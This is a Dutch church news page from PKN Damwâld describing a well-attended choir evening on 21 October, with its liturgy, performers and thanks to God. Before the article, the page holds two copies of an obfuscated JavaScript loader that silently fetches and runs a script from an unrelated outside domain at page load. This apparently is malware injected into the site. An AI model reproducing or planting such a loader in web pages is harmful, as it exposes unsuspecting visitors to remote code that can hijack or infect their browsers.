;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zingend naar de Zondag: Een overweldigend optreden op 21 oktober - PKN Damwâld

Zingend naar de Zondag: Een overweldigend optreden op 21 oktober

Gepubliceerd op: woensdag 25 oktober

Een succes komt niet uit de lucht vallen, daar moet je wel wat voor doen. En dan nog!

Er zijn veel aspecten die je als organisatie niet in de hand hebt. Je kunt alles zo goed mogelijk voorbereiden, zoals een goed koor vragen (ze zijn eerder geweest), het zoeken van de publiciteit, de kerk en zalen goed prepareren, zorgen voor voldoende vrijwilligers, liturgieën en attenties maar……. Het weer, een volle kerk, koorleden met dirigent en organist en de leiding, inzet en vooral enthousiasme bij iedereen, alles moet meewerken en samenvallen. Afgelopen zaterdagavond was dit het geval. Na afloop was het hartverwarmend om te zien en te horen van publiek, koorleden, dirigent, organist en dominee, hoe ze hadden genoten.

Rode draad deze avond, het door onze Heer gedragen worden, kwam o.a. tot uitdrukking in de liturgie door het lied “In Gods hand” gezongen door het koor, het gedicht “Voetstappen” en op alle pagina’s voetstappen. Het werd ingetogen en ontroerend gezongen! Het koor, met een zeer bekwame en enthousiaste dirigent Leander van der Steen en organist Bert Elbertsen, was zeer op dreef en het publiek wilde daar niet voor onder doen en ging met de samenzang zelf ook uit het dak.

Als verrassing voor iedereen, zong tenor en dirigent Annejaap Soldaat uit Damwald mee met het lied “Jeruzalem” en ook bij de samenzang aan het einde van de avond. Op zijn website is te lezen dat hij en dirigent van der Steen elkaar kennen van de kerstconcerten in het concertgebouw te Amsterdam. Zijn meedoen was de kers op de toch al zo mooie taart!

Onze liturgie hebben we al maanden geleden in overleg met het koor samengesteld. Dat nadien de situatie in het Midden Oosten tussen Joden en Palestijnen zo ontspoorde, konden we toen niet voorzien. De liederen “Lied voor Israel” en “Jeruzalem”, gezongen door het koor moeten daarom ook niet als mening of (voor) oordeel worden gezien. 1 ding is zeker, aan beide kanten vallen veel doden, van vooral heel veel onschuldige burgers van groot tot zeer klein en dat maakt erg verdrietig.

De leiding deze avond was in handen van Ton van der Wekken, dominee van de Chr. Gereformeerde Kerk te Dokkum. Hij was als een vis in het water en wisselde serieuze momenten af met de nodige zelfspot die in de smaak viel.

Voor dirigent, organist, dominee en koster Elizabeth waren er bloemen na afloop.

Ondanks al onze inspanningen, was deze avond niet geslaagd zonder de dragende kracht van de Heilige Geest. Dank aan onze Heer en God.